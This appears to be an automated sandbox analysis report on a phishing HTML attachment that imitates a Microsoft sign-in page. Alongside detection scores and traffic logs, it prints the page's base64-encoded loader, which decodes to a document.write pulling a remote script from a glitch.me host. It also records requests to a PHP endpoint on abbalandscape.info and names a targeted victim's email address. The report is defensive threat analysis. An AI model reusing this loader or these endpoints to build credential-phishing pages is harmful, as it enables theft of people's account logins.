Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
LLM: Score: 9 brands: Microsoft Reasons: The URL 'file:///C:/Users/user/Desktop/RemittanceCopy389.html' is a local file path, which is highly suspicious and not typical for legitimate websites. The page mimics a Microsoft login page, which is a common target for phishing attacks. The email domain 'mainstreetcbf.com' does not match the legitimate Microsoft domain. The presence of a prominent login form and the use of social engineering techniques to mimic a legitimate brand further indicate that this is a phishing attempt. DOM: 0.0.pages.csv |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
LLM: Score: 9 brands: Microsoft Reasons: The URL 'file:///C:/Users/user/Desktop/RemittanceCopy389.html#' is a local file path, which is highly suspicious for a legitimate login page. Legitimate Microsoft login pages would be hosted on the 'microsoft.com' domain. The image shows a login form that closely resembles Microsoft's login page, which is a common social engineering technique used in phishing attacks. Additionally, the presence of a prominent login form and a suspicious link ('Can't access your account?') further indicate phishing. Therefore, this site is highly likely to be a phishing site. DOM: 1.1.pages.csv |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
Matcher: Template: microsoft matched with high similarity |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
Matcher: Template: microsoft matched with high similarity |
Source: Yara match |
File source: 1.1.pages.csv, type: HTML |
Source: Yara match |
File source: 0.0.pages.csv, type: HTML |
Source: RemittanceCopy389.html |
HTTP Parser: Low number of body elements: 0 |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: New script, src: data:/html;base64,ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcm91bmRlZC1zY3JlZWNoaW5nLXNjcmlwdC5nbGl0Y2gubWUvZGF0cy5qcyI+PC9zY3JpcHQ+Jyk7 |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: New script, src: data:/html;base64,ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcm91bmRlZC1zY3JlZWNoaW5nLXNjcmlwdC5nbGl0Y2gubWUvZGF0cy5qcyI+PC9zY3JpcHQ+Jyk7 |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
Tab title: Sign in to Best Productivity Provider! |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
Tab title: Sign in to Best Productivity Provider! |
Source: RemittanceCopy389.html |
HTTP Parser: Base64 decoded: document.write |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: Base64 decoded: document.write |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: Base64 decoded: document.write |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
Matcher: Found strong image similarity, brand: MICROSOFT |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
Matcher: Template: microsoft matched |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
Matcher: Template: microsoft matched |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: tracy.durrance@mainstreetcbf.com |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: Total embedded image size: 31111 |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: Total embedded image size: 31111 |
Source: RemittanceCopy389.html |
HTTP Parser: Base64 decoded: document.write('<script type="text/javascript" src="https://rounded-screeching-script.glitch.me/dats.js"></script>'); |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: Title: Sign in to Best Productivity Provider! does not match URL |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: Title: Sign in to Best Productivity Provider! does not match URL |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: Invalid link: Forgot my password |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: Invalid link: Forgot my password |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: Has password / email / username input fields |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: Has password / email / username input fields |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: <input type="password" .../> found |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: <input type="password" .../> found |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: No <meta name="author".. found |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: No <meta name="author".. found |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: No <meta name="copyright".. found |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html# |
HTTP Parser: No <meta name="copyright".. found |
Source: unknown |
HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49752 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49754 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49771 version: TLS 1.2 |
Source: global traffic |
TCP traffic: 192.168.2.4:54379 -> 1.1.1.1:53 |
Source: Joe Sandbox View |
IP Address: 104.17.24.14 104.17.24.14 |
Source: Joe Sandbox View |
IP Address: 13.107.246.44 13.107.246.44 |
Source: Joe Sandbox View |
IP Address: 13.107.246.60 13.107.246.60 |
Source: Joe Sandbox View |
IP Address: 151.101.130.137 151.101.130.137 |
Source: Joe Sandbox View |
JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.20.57.24 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.20.57.24 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.20.57.24 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.20.57.24 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.165.165.26 |
Source: global traffic |
HTTP traffic detected: GET /dats.js HTTP/1.1Host: rounded-screeching-script.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /set.js HTTP/1.1Host: rounded-screeching-script.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S5gvZ42ZN9G8uNw&MD=5pMyKrEA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /wp-ad/c188fdc.php HTTP/1.1Host: abbalandscape.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /wp-ad/c188fdc.php HTTP/1.1Host: abbalandscape.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=799adb9add4c99ae98bc8ef1f2230e90 |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S5gvZ42ZN9G8uNw&MD=5pMyKrEA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: global traffic |
DNS traffic detected: DNS query: rounded-screeching-script.glitch.me |
Source: global traffic |
DNS traffic detected: DNS query: cdnjs.cloudflare.com |
Source: global traffic |
DNS traffic detected: DNS query: www.google.com |
Source: global traffic |
DNS traffic detected: DNS query: code.jquery.com |
Source: global traffic |
DNS traffic detected: DNS query: abbalandscape.info |
Source: unknown |
HTTP traffic detected: POST /wp-ad/c188fdc.php HTTP/1.1Host: abbalandscape.infoConnection: keep-aliveContent-Length: 37sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: chromecache_137.2.dr |
String found in binary or memory: http://fontawesome.io |
Source: chromecache_137.2.dr |
String found in binary or memory: http://fontawesome.io/license |
Source: unknown |
Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49769 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49770 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 54381 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49675 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49754 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49773 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49771 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49770 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49767 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49768 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 54381 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49754 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49773 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49769 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49768 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49767 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49771 -> 443 |
Source: unknown |
HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49752 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49754 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49771 version: TLS 1.2 |
Source: Name includes: RemittanceCopy389.html |
Initial sample: remit |
Source: classification engine |
Classification label: mal96.phis.winHTML@31/17@14/12 |
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\RemittanceCopy389.html" |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1948,i,4964140377372381568,1844792585278010681,262144 /prefetch:8 |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1948,i,4964140377372381568,1844792585278010681,262144 /prefetch:8 |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Automated click: Next |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html |
HTTP Parser: file:///C:/Users/user/Desktop/RemittanceCopy389.html |